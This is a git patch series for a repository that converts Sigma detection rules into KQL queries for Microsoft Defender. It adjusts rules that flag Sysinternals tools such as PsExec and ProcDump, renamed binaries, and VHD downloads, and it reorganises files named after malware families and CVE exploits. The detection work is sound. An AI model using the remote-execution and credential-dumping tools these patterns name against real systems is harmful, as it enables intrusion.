+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools
+// - Programs that use the same Registry Key
+
+DeviceRegistryEvents
 | where ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql b/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql
index d3ff592c..b69bf4bd 100644
--- a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql
+++ b/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Sysinternals Tools Execution - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-24
-// Level: medium
-// Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1588.002
-// False Positives:
-// - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment
-
-DeviceRegistryEvents
+// Title: PUA - Sysinternals Tools Execution - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: medium
+// Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment
+
+DeviceRegistryEvents
 | where ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql b/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql
index cb5b7879..df3db5cf 100644
--- a/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql
+++ b/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed SysInternals DebugView Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-05-28
-// Level: high
-// Description: Detects suspicious renamed SysInternals DebugView execution
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1588.002
-
-DeviceProcessEvents
+// Title: Renamed SysInternals DebugView Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-28
+// Level: high
+// Description: Detects suspicious renamed SysInternals DebugView execution
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+
+DeviceProcessEvents
 | where ProcessVersionInfoProductName =~ "Sysinternals DebugView" and (not((FolderPath endswith "\\Dbgview.exe" and ProcessVersionInfoOriginalFileName =~ "Dbgview.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
index bd4f091f..71f6738d 100644
--- a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
+++ b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-24
-// Level: high
-// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1588.002
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or 
InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql b/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql
index 5aeb0935..401bbb74 100644
--- a/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql
+++ b/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Keyboard Layout Load
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-10-12
-// Level: medium
-// Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1588.002
-// False Positives:
-// - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)
-
-DeviceRegistryEvents
+// Title: Suspicious Keyboard Layout Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-12
+// Level: medium
+// Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "00000429" or RegistryValueData contains "00050429" or RegistryValueData contains "0000042a") and (RegistryKey endswith "\\Keyboard Layout\\Preload*" or RegistryKey endswith "\\Keyboard Layout\\Substitutes*")
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql b/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql
index bf26a7da..7e0c2a34 100644
--- a/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql
+++ b/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql
@@ -1,12 +1,12 @@
-// Title: Uncommon File Created In Office Startup Folder
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-05
-// Level: high
-// Description: Detects the creation of a file with an uncommon extension in an Office application startup folder
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1587.001
-// False Positives:
-// - False positive might stem from rare extensions used by other Office utilities.
-
-DeviceFileEvents
+// Title: Uncommon File Created In Office Startup Folder
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-05
+// Level: high
+// Description: Detects the creation of a file with an uncommon extension in an Office application startup folder
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+// - False positive might stem from rare extensions used by other Office utilities.
+
+DeviceFileEvents
 | where (((FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP")) and (not((FolderPath endswith ".docb" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dotm" or FolderPath endswith ".mdb" or FolderPath endswith ".mdw" or FolderPath endswith ".pdf" or FolderPath endswith ".wll" or FolderPath endswith ".wwl")))) or ((FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")) and (not((FolderPath endswith ".xll" or FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm" or FolderPath endswith ".xlw"))))) and (not((((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains 
":\\Program Files (x86)\\Microsoft Office\\") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql b/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql
index 8fb57420..978606fc 100644
--- a/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql
+++ b/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql
@@ -1,12 +1,12 @@
-// Title: Usage of Renamed Sysinternals Tools - RegistrySet
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-24
-// Level: high
-// Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1588.002
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Usage of Renamed Sysinternals Tools - RegistrySet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where ((RegistryKey contains "\\PsExec" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\Active Directory Explorer") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith 
"\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe"))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql
index 6d0b5249..9281e3e4 100644
--- a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql
+++ b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql
@@ -1,13 +1,13 @@
-// Title: VHD Image Download Via Browser
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021-10-25
-// Level: medium
-// Description: Detects creation of ".vhd"/".vhdx" files by browser processes.
-// Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1587.001
-// False Positives:
-// - Legitimate downloads of ".vhd" files would also trigger this
-
-DeviceFileEvents
+// Title: VHD Image Download Via Browser
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-10-25
+// Level: medium
+// Description: Detects creation of ".vhd"/".vhdx" files by browser processes.
+// Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+// - Legitimate downloads of ".vhd" files would also trigger this
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") and FolderPath contains ".vhd"
\ No newline at end of file
diff --git a/sigma b/sigma
new file mode 160000
index 00000000..c2f1eb41
--- /dev/null
+++ b/sigma
@@ -0,0 +1 @@
+Subproject commit c2f1eb41bc5c9f246339545e8fd5ee14ed7f8332
From 8f3f2eed588ae140a348b40e87b4abf28e895df7 Mon Sep 17 00:00:00 2001
From: Kaiber_wsl_desktop
Date: Sun, 16 Nov 2025 15:29:58 +1100
Subject: [PATCH 08/17] adjusted cron schedule to run once a week on sunday at 2am UTC
---
 .github/workflows/update-sigma-rules.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/update-sigma-rules.yml b/.github/workflows/update-sigma-rules.yml
index a5d02499..6061f485 100644
--- a/.github/workflows/update-sigma-rules.yml
+++ b/.github/workflows/update-sigma-rules.yml
@@ -2,8 +2,8 @@ name: Update Sigma to KQL Rules
 on: schedule: - # Run daily at 2 AM UTC - - cron: '0 2 * * *' + # Run weekly on Sunday at 2 AM UTC + - cron: '0 2 * * 0' workflow_dispatch: # Allow manual trigger
From 4c2b9ca4be6b6bd780e75fe0bfdf925d3ee3d62d Mon Sep 17 00:00:00 2001
From: kaiberxc <89855993+Khadinxc@users.noreply.github.com>
Date: Sun, 16 Nov 2025 16:40:52 +1100
Subject: [PATCH 09/17] Added badges to readme
---
 README.md | 1 +
 1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index ba769d7d..84fc725d 100644
--- a/README.md
+++ b/README.md
@@ -1,3 +1,4 @@
+![Update Sigma Rules](https://github.com/Khadinxc/Sigma2KQL/actions/workflows/update-sigma-rules.yml/badge.svg)
 # Sigma2KQL - Working as of 15/11/2025
 Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main)
From 7f88737b8252cb2bb760f23f48462313bcd1ca34 Mon Sep 17 00:00:00 2001
From: Kaiber_wsl_desktop
Date: Sun, 16 Nov 2025 16:41:52 +1100
Subject: [PATCH 10/17] another badge
---
 README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 84fc725d..28f49e3a 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,6 @@
 ![Update Sigma Rules](https://github.com/Khadinxc/Sigma2KQL/actions/workflows/update-sigma-rules.yml/badge.svg)
-# Sigma2KQL - Working as of 15/11/2025
+![GitHub last commit](https://img.shields.io/github/last-commit/Khadinxc/Sigma2KQL)
+# Sigma2KQL - Automated Updates
 Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main)
 __Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__
From 9acd316b5dc0edd1cba0c444ce36e03850d528c4 Mon Sep 17 00:00:00 2001
From: kaiberxc <89855993+Khadinxc@users.noreply.github.com> Date: Fri, 28 Nov 2025 18:33:31 +1100 Subject: [PATCH 11/17] Updated helper script to sort into the same directory structure as the SIGMA rules repo making it easier to follow the pattern established there instead of searching in tactics folders. Updated readme too. --- .../TA/Axiom}/zxshell_malware.kql | 0 .../Turla}/turla_group_commands_may_2020.kql | 0 .../Turla}/turla_group_lateral_movement.kql | 0 .../exploit_for_cve_2015_1641.kql | 0 .../exploit_for_cve_2017_0261.kql | 0 .../droppers_exploiting_cve_2017_11882.kql | 0 .../exploit_for_cve_2017_8759.kql | 0 .../Malware/Adwind-RAT}/adwind_rat_jrat.kql | 0 .../Fireball}/fireball_archer_install.kql | 0 .../notpetya_ransomware_activity.kql | 0 .../PlugX}/potential_plugx_activity.kql | 0 .../wannacry_ransomware_activity.kql | 0 .../potential_apt10_cloud_hopper_activity.kql | 0 .../ps_exe_renamed_sysinternals_tool.kql | 0 .../lazarus_system_binary_masquerading.kql | 0 .../TA/Pandemic}/pandemic_registry_key.kql | 0 .../elise_backdoor_activity.kql | 0 .../APT27}/apt27_emissary_panda_activity.kql | 0 .../APT28}/sofacy_trojan_loader_activity.kql | 0 ...ishing_campaign_commandline_indicators.kql | 0 ...2018_phishing_campaign_file_indicators.kql | 0 .../oceanlotus_registry_activity.kql | 0 .../potential_muddywater_apt_activity.kql | 0 .../TA/OilRig}/oilrig_apt_activity.kql | 0 .../oilrig_apt_registry_persistence.kql | 0 .../TA/Slingshot}/defrag_deactivation.kql | 0 .../tropictrooper_campaign_november_2018.kql | 0 .../potential_bearlpe_exploitation.kql | 0 ...oiting_setupcomplete_cmd_cve_2019_1378.kql | 0 .../exploiting_cve_2019_1388.kql | 0 ...do_privilege_escalation_cve_2019_14287.kql | 0 .../potential_baby_shark_malware_activity.kql | 0 .../Dridex}/potential_dridex_activity.kql | 0 .../potential_dtrack_rat_activity.kql | 0 .../Emotet}/potential_emotet_activity.kql | 0 .../Formbook}/formbook_process_creation.kql | 0 .../lockergoga_ransomware_activity.kql | 0 
.../Malware/QBot}/potential_qbot_activity.kql | 0 .../potential_ryuk_ransomware_activity.kql | 0 .../potential_snatch_ransomware_activity.kql | 0 ...ntial_ursnif_malware_activity_registry.kql | 0 ...ushroom_dll_load_activity_via_regsvr32.kql | 0 .../APT31}/apt31_judgement_panda_activity.kql | 0 ..._russian_apt_credential_theft_activity.kql | 0 .../potential_empiremonkey_activity.kql | 0 ...ation_group_dll_u_export_function_load.kql | 0 .../MustangPanda}/mustang_panda_dropper.kql | 0 .../operation_wocao_activity.kql | 0 ...oited_cve_2020_10189_zoho_manageengine.kql | 0 ..._suspicious_new_printer_ports_registry.kql | 0 ...s_printerports_creation_cve_2020_1048_.kql | 0 .../CVE-2020-1350}/dns_rce_cve_2020_1350.kql | 0 ...e_2020_1472_execution_of_zerologon_poc.kql | 0 .../Blue-Mockingbird}/blue_mockingbird.kql | 0 .../blue_mockingbird_registry.kql | 0 .../potential_emotet_rundll32_execution.kql | 0 .../FlowCloud}/flowcloud_registry_markers.kql | 0 ...ial_ke3chang_tidepool_malware_activity.kql | 0 .../potential_maze_ransomware_activity.kql | 0 .../Trickbot}/trickbot_malware_activity.kql | 0 ...lden_chickens_deployment_via_ocx_files.kql | 0 .../TA/GALLIUM}/gallium_iocs.kql | 0 .../greenbug_espionage_group_indicators.kql | 0 .../TA/Lazarus}/lazarus_group_activity.kql | 0 .../leviathan_registry_key_activity.kql | 0 .../suspicious_vbscript_un2452_pattern.kql | 0 .../unc2452_powershell_pattern.kql | 0 .../unc2452_process_creation_patterns.kql | 0 .../TA/TAIDOOR-RAT}/taidoor_rat_dll_load.kql | 0 .../winnti_malware_hk_university_campaign.kql | 0 .../winnti_pipemon_characteristics.kql | 0 ..._spooler_exploitation_filename_pattern.kql | 0 ...al_printnightmare_exploitation_attempt.kql | 0 .../printernightmare_mimikatz_driver_name.kql | 0 ...spooler_service_suspicious_binary_load.kql | 0 ...ce_cve_2021_26084_exploitation_attempt.kql | 0 ...al_cve_2021_26857_exploitation_attempt.kql | 0 .../cve_2021_26858_exchange_exploitation.kql | 0 ...cve_2021_31979_cve_2021_33771_exploits.kql | 
0 ...979_cve_2021_33771_exploits_by_sourgum.kql | 0 ...xploitation_cve_2021_35211_by_dev_0322.kql | 0 ...al_cve_2021_40444_exploitation_attempt.kql | 0 ...tation_attempt_from_office_application.kql | 0 ...ous_word_cab_file_write_cve_2021_40444.kql | 0 ...r_lpe_cve_2021_41379_file_create_event.kql | 0 ...al_cve_2021_41379_exploitation_attempt.kql | 0 ...ve_2021_44077_poc_default_dropped_file.kql | 0 ...28_exploitation_attempt_vmware_horizon.kql | 0 ...ous_razerinstaller_explorer_subprocess.kql | 0 ...l_systemnightmare_exploitation_attempt.kql | 0 .../blackbyte_ransomware_registry.kql | 0 ...otential_blackbyte_ransomware_activity.kql | 0 .../conti_ntds_exfiltration_command.kql | 0 .../Conti}/conti_volume_shadow_listing.kql | 0 .../potential_conti_ransomware_activity.kql | 0 ...e_database_dumping_activity_via_sqlcmd.kql | 0 .../DarkSide}/darkside_ransomware_pattern.kql | 0 ...tial_devil_bait_malware_reconnaissance.kql | 0 ...potential_devil_bait_related_indicator.kql | 0 .../foggyweb_backdoor_dll_loading.kql | 0 .../goofy_guineapig_backdoor_ioc.kql | 0 ...tial_goofy_guineapig_backdoor_activity.kql | 0 ...guineapig_goolgeupdate_process_anomaly.kql | 0 .../moriya_rootkit_file_created.kql | 0 ...otential_netwire_rat_activity_registry.kql | 0 .../Pingback}/pingback_backdoor_activity.kql | 0 ...pingback_backdoor_dll_loading_activity.kql | 0 .../pingback_backdoor_file_indicators.kql | 0 ...ll_sieve_malware_commandline_indicator.kql | 0 ..._sieve_malware_file_indicator_creation.kql | 0 ...all_sieve_malware_registry_persistence.kql | 0 ...hafnium_exchange_exploitation_activity.kql | 0 ...revil_kaseya_incident_malware_patterns.kql | 0 .../apt_privatelog_image_load_pattern.kql | 0 .../TA/SOURGUM}/sourgum_actor_behaviours.kql | 0 ...ve_2023_21554_queuejumper_exploitation.kql | 0 ...space_one_access_remote_code_execution.kql | 0 ...22_24527_microsoft_connected_cache_lpe.kql | 0 .../atlassian_confluence_cve_2022_26134.kql | 0 ...al_cve_2022_26809_exploitation_attempt.kql | 0 
...al_cve_2022_29072_exploitation_attempt.kql | 0 ...ue_of_msdt_in_registry_cve_2022_30190_.kql | 0 ...hell_command_injection_processcreation.kql | 0 .../suspicious_sysmon_as_execution_parent.kql | 0 .../chromeloader_malware_execution.kql | 0 .../emotet_loader_execution_via_lnk_file.kql | 0 .../hermetic_wiper_tg_process_patterns.kql | 0 ...ential_raspberry_robin_dot_ending_file.kql | 0 ..._initial_execution_from_external_drive.kql | 0 ...robin_subsequent_execution_of_commands.kql | 0 ...r_payload_execution_via_scheduled_task.kql | 0 .../fakeupdates_socgholish_activity.kql | 0 ...otential_actinium_persistence_activity.kql | 0 .../TA/MERCURY}/mercury_apt_activity.kql | 0 ...icious_confluence_child_process_linux_.kql | 0 ...ious_confluence_child_process_windows_.kql | 0 .../outlook_task_note_reminder_received.kql | 0 ...on_hta_file_creation_by_foxitpdfreader.kql | 0 ...tation_dynamic_compilation_via_csc_exe.kql | 0 ..._exploitation_fake_wermgr_exe_creation.kql | 0 ...874_exploitation_fake_wermgr_execution.kql | 0 ...loitation_uncommon_report_wer_location.kql | 0 ...e_2023_36884_exploitation_dropped_file.kql | 0 ...tempt_suspicious_double_extension_file.kql | 0 ...ttempt_suspicious_winrar_child_process.kql | 0 ...tential_exploitation_rev_file_creation.kql | 0 ...empt_of_undocumented_windowsserver_rce.kql | 0 ...l_rat_anonymous_user_process_execution.kql | 0 ...oldsteel_rat_cleanup_command_execution.kql | 0 ...teel_rat_service_persistence_execution.kql | 0 ...steel_persistence_service_dll_creation.kql | 0 ...coldsteel_persistence_service_dll_load.kql | 0 ...otential_coldsteel_rat_file_indicators.kql | 0 ...al_coldsteel_rat_windows_user_creation.kql | 0 ...kgate_autoit3_exe_execution_parameters.kql | 0 ..._exe_file_creation_by_uncommon_process.kql | 0 .../darkgate_user_created_via_net_exe.kql | 0 .../griffon_malware_attack_pattern.kql | 0 ...ss_spawning_rundll32_guloader_activity.kql | 0 ...ingle_digit_dll_execution_via_rundll32.kql | 0 
...l_extension_execution_via_rundll32_exe.kql | 0 .../potential_pikabot_c2_activity.kql | 0 .../potential_pikabot_discovery_activity.kql | 0 .../potential_pikabot_hollowing_activity.kql | 0 ...cious_command_combinations_via_cmd_exe.kql | 0 .../potential_qakbot_rundll32_execution.kql | 0 .../Qakbot}/qakbot_regsvr32_calc_pattern.kql | 0 .../qakbot_rundll32_exports_execution.kql | 0 ..._rundll32_fake_dll_extension_execution.kql | 0 .../Qakbot}/qakbot_uninstaller_execution.kql | 0 ...stealer_module_launch_via_rundll32_exe.kql | 0 ...orschach_ransomware_execution_activity.kql | 0 ...registry_blob_related_to_snake_malware.kql | 0 ..._malware_installation_binary_indicator.kql | 0 ...e_installation_cli_arguments_indicator.kql | 0 ..._malware_persistence_service_execution.kql | 0 ...nake_malware_covert_store_registry_key.kql | 0 ...nake_malware_installer_name_indicators.kql | 0 ...e_malware_kernel_driver_file_indicator.kql | 0 ...are_werfault_persistence_file_creation.kql | 0 ...snif_redirection_of_discovery_commands.kql | 0 ..._dll_load_by_compromised_3cxdesktopapp.kql | 0 ...cxdesktopapp_beaconing_activity_netcon.kql | 0 ...al_compromised_3cxdesktopapp_execution.kql | 0 ...promised_3cxdesktopapp_update_activity.kql | 0 ...picious_child_process_of_3cxdesktopapp.kql | 0 ...ed_by_svr_for_graphicalproton_backdoor.kql | 0 ...d_sleet_apt_dll_sideloading_indicators.kql | 0 ...ond_sleet_apt_file_creation_indicators.kql | 0 ..._sleet_apt_process_activity_indicators.kql | 0 ...t_apt_scheduled_task_creation_registry.kql | 0 ...nnaissance_powertrash_related_activity.kql | 0 ...fin7_related_powershell_script_created.kql | 0 .../lace_tempest_cobalt_strike_download.kql | 0 .../lace_tempest_file_indicators.kql | 0 .../lace_tempest_malware_loader_execution.kql | 0 .../lazarus_apt_dll_sideloading_activity.kql | 0 ...erafaspex_suspicious_process_execution.kql | 0 ...storm_log4j_wstomcat_process_execution.kql | 0 ...ageengine_suspicious_process_execution.kql | 0 
..._panda_activity_against_australian_gov.kql | 0 ...nyx_sleet_apt_file_creation_indicators.kql | 0 ..._mf_ng_exploitation_related_indicators.kql | 0 .../papercut_mf_ng_potential_exploitation.kql | 0 ...dstorm_apt_process_activity_indicators.kql | 0 ..._barracuda_esg_exploitation_indicators.kql | 0 ...mpressed_files_from_temp_sh_using_wget.kql | 0 ...file_from_untrusted_direct_ip_via_wget.kql | 0 ...nc4841_email_exfiltration_file_pattern.kql | 0 .../unc4841_potential_seaspy_execution.kql | 0 ...l_certificate_exfiltration_via_openssl.kql | 0 ...eenconnect_path_traversal_exploitation.kql | 0 ...reenconnect_user_database_modification.kql | 0 ...2024_3094_suspicious_ssh_child_process.kql | 0 ...ect_os_command_injection_file_creation.kql | 0 ...l_cve_2024_35250_exploitation_activity.kql | 0 ...uspicious_creation_of_esx_admins_group.kql | 0 ...e_2024_50623_exploitation_attempt_cleo.kql | 0 ...eamer_rat_loading_net_executable_image.kql | 0 ...op_darkgate_loader_in_c_temp_directory.kql | 0 .../file_creation_related_to_rat_clients.kql | 0 ...kabot_activity_lure_document_execution.kql | 0 ...tivity_shutdown_schedule_task_creation.kql | 0 ...ot_activity_winlogon_shell_persistence.kql | 0 ...vity_execution_of_more_com_and_vbc_exe.kql | 0 ...raspberry_robin_cpl_execution_activity.kql | 0 ...registry_set_internet_settings_zonemap.kql | 0 .../kapeka_backdoor_autorun_persistence.kql | 0 ...eka_backdoor_configuration_persistence.kql | 0 ...ka_backdoor_execution_via_rundll32_exe.kql | 0 ...apeka_backdoor_loaded_via_rundll32_exe.kql | 0 .../kapeka_backdoor_persistence_activity.kql | 0 ...al_kapeka_decrypted_backdoor_indicator.kql | 0 